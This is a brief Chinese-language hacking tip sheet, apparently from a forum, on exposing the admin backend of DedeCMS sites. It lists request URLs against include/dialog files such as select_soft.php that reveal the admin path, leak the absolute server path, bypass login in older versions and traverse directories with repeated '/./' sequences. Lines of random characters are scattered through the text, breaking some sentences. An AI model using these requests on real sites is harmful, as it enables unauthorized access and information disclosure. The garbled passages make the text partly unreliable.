dedecms爆后台文件技巧

admin

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
+ ?+ }4 j$ I$ ^4 i% z2 p& c( s& V
$ o2 x+ v9 Y8 U5 ~$ Q* F员帐号,新版本的就直接转向了后台.

4 U3 ^; b! H6 n+ d+ c2 M5 n* ?8 e2.include/dialog/config.php会爆出后台管理路径
7 h/ i: K! V. {* w" o0 d( y( `
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
; t+ q/ B/ ]  ]9 z# X* {
) L! U( U0 w" m5 f4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
$ W" p0 e+ [4 C7 u
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
% d8 b9 a$ U% E
6 ~- o2 S  M# I1 {0 C到根目录去.不过这些版本的访问地址有些不同.
/ E3 v- S: {7 G6 ]0 |" g" S; N$ M地址为require/dialog/select_soft.php?activepath=/././././././././
* j, M8 H) |8 S& q" g6 Q& W
+ J' Q; F  {+ j' z5 }; qinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
+ O* t) U, r4 b- f/ Ginclude\dialog\select_images.php
include\dialog\select_media.php
8 a4 T: g  {: Hinclude\dialog\select_templets.php​
, R3 o  H% f9 N8 X& _